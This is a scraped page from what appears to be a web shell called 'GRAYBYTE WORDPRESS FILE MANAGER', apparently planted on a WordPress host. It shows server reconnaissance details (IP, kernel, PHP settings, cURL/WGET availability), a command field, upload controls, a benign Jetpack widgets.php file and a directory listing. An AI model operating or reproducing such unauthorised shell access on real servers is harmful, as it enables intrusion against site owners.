GRAYBYTE WORDPRESS FILE MANAGER6927

Server IP : 162.213.255.40 / Your IP : 216.73.216.114
System : Linux server146.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/hellrfbn/public_html/wp-content/updraft/plugins-old/jetpack/modules/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/hellrfbn/public_html/wp-content/updraft/plugins-old/jetpack/modules//widgets.php
<?php
/**
 * Module Name: Extra Sidebar Widgets
 * Module Description: Provides additional widgets for use on your site.
 * Sort Order: 4
 * First Introduced: 1.2
 * Requires Connection: No
 * Auto Activate: No
 * Module Tags: Social, Appearance
 * Feature: Appearance
 * Additional Search Queries: widget, widgets, facebook, gallery, twitter, gravatar, image, rss
 *
 * @package automattic/jetpack
 */

/**
 * Load Jetpack widget files.
 */
function jetpack_load_widgets() {
	$widgets_include = array();

	foreach ( Jetpack::glob_php( __DIR__ . '/widgets' ) as $file ) {
		$widgets_include[] = $file;
	}
	/**
	 * Modify which Jetpack Widgets to register.
	 *
	 * @module widgets
	 *
	 * @since 2.2.1
	 *
	 * @param array $widgets_include An array of widgets to be registered.
	 */
	$widgets_include = apply_filters( 'jetpack_widgets_to_include', $widgets_include );

	foreach ( $widgets_include as $include ) {
		include_once $include;
	}

	include_once __DIR__ . '/widgets/migrate-to-core/image-widget.php';
	include_once __DIR__ . '/widgets/migrate-to-core/gallery-widget.php';
}

add_action( 'jetpack_modules_loaded', 'jetpack_widgets_loaded' );
/**
 * Actions to perform after Jetpack widgets are loaded.
 */
function jetpack_widgets_loaded() {
	Jetpack::enable_module_configurable( __FILE__ );
	add_filter( 'jetpack_module_configuration_url_widgets', 'jetpack_widgets_configuration_url' );
}

/**
 * Overrides default configuration url
 *
 * @uses admin_url
 * @return string module settings URL
 */
function jetpack_widgets_configuration_url() {
	return admin_url( 'customize.php?autofocus[panel]=widgets' );
}

jetpack_load_widgets();

/**
 * Enqueue utilities to work with widgets in Customizer.
 *
 * @since 4.4.0
 */
function jetpack_widgets_customizer_assets_preview() {
	wp_enqueue_script(
		'jetpack-customizer-widget-utils',
		plugins_url( '/widgets/customizer-utils.js', __FILE__ ),
		array( 'jquery', 'customize-base' ),
		JETPACK__VERSION,
		false
	);
}
add_action( 'customize_preview_init', 'jetpack_widgets_customizer_assets_preview' );

/**
 * Enqueue styles to stylize widgets in Customizer.
 *
 * @since 4.4.0
 */
function jetpack_widgets_customizer_assets_controls() {
	wp_enqueue_style(
		'jetpack-customizer-widget-controls',
		plugins_url( '/widgets/customizer-controls.css', __FILE__ ),
		array( 'customize-widgets' ),
		JETPACK__VERSION
	);
}
add_action( 'customize_controls_enqueue_scripts', 'jetpack_widgets_customizer_assets_controls' );

/**
 * Cleanup old Jetpack widgets data.
 */
function jetpack_widgets_remove_old_widgets() {
	$old_widgets = array(
		'googleplus-badge',
	);

	// Don't bother cleaning up the sidebars_widgets data.
	// That will get cleaned up the next time a widget is
	// added, removed, moved, etc.
	foreach ( $old_widgets as $old_widget ) {
		delete_option( "widget_{$old_widget}" );
	}
}

add_action( 'updating_jetpack_version', 'jetpack_widgets_remove_old_widgets' );

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
calypsoify
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
carousel
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
cloudflare-analytics
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
comment-likes
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
comments
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
custom-css
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
custom-post-types
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
geo-location
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
google-analytics
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
google-fonts
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
gravatar
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
infinite-scroll
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
likes
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
markdown
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
masterbar
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
memberships
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
photon-cdn
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
plugin-search
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
post-by-email
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
related-posts
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
scan
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
seo-tools
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
sharedaddy
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
shortcodes
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
simple-payments
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
site-icon
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
sitemaps
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
sso
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
stats
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
subscriptions
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
theme-tools
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
tiled-gallery
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
verification-tools
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
videopress
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
widget-visibility
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
widgets
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
woocommerce-analytics
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
wordads
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
wpcom-block-editor
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
wpcom-tos
--
July 23 2025 07:38:27
hellrfbn / hellrfbn
0755
.htaccess
0.41 KB
July 23 2025 07:38:27
hellrfbn / hellrfbn
0644
blaze.php
0.963 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
carousel.php
0.56 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
comment-likes.php
7.815 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
comments.php
1.058 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
contact-form.php
6.656 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
copy-post.php
12.801 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
custom-content-types.php
1.533 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
custom-css.php
1.793 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
geo-location.php
2.438 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
google-analytics.php
0.637 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
google-fonts.php
0.521 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
gravatar-hovercards.php
11.836 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
infinite-scroll.php
8.189 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
json-api.php
0.473 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
latex.php
4.609 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
likes.php
19.646 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
markdown.php
0.983 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
masterbar.php
1.744 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
module-extras.php
2.855 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
module-headings.php
44.438 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
module-info.php
27.25 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
monitor.php
3.506 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
notes.php
7.925 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
photon-cdn.php
12.174 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
photon.php
0.694 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
plugin-search.php
21.577 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
post-by-email.php
0.582 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
post-list.php
0.521 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
protect.php
0.678 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
publicize.php
4.048 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
related-posts.php
2.142 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
search.php
1.174 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
seo-tools.php
1.521 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
sharedaddy.php
1.597 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
shortcodes.php
6.063 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
shortlinks.php
4.399 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
sitemaps.php
1.278 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
sso.php
0.76 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
stats.php
54.622 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
subscriptions.php
32.574 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
theme-tools.php
2.518 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
tiled-gallery.php
1.055 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
vaultpress.php
1.769 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
verification-tools.php
0.811 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
videopress.php
0.983 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
waf.php
0.29 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
widget-visibility.php
0.464 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
widgets.php
2.86 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
woocommerce-analytics.php
0.527 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
wordads.php
0.572 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644
wpgroho.js
1.907 KB
June 11 2024 05:16:28
hellrfbn / hellrfbn
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF